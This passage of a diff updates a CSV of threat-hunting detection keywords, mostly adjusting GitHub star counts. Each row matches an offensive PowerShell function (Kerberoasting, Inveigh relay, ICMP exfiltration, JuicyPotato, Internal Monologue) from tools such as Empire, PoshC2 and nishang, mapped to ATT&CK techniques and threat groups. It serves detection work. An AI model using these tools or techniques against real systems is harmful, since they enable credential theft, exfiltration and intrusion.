poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-IcmpDownload*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpDownload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpUpload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" -"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-InstalledServicesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
-"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-IR*","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red 
teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*invokekerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
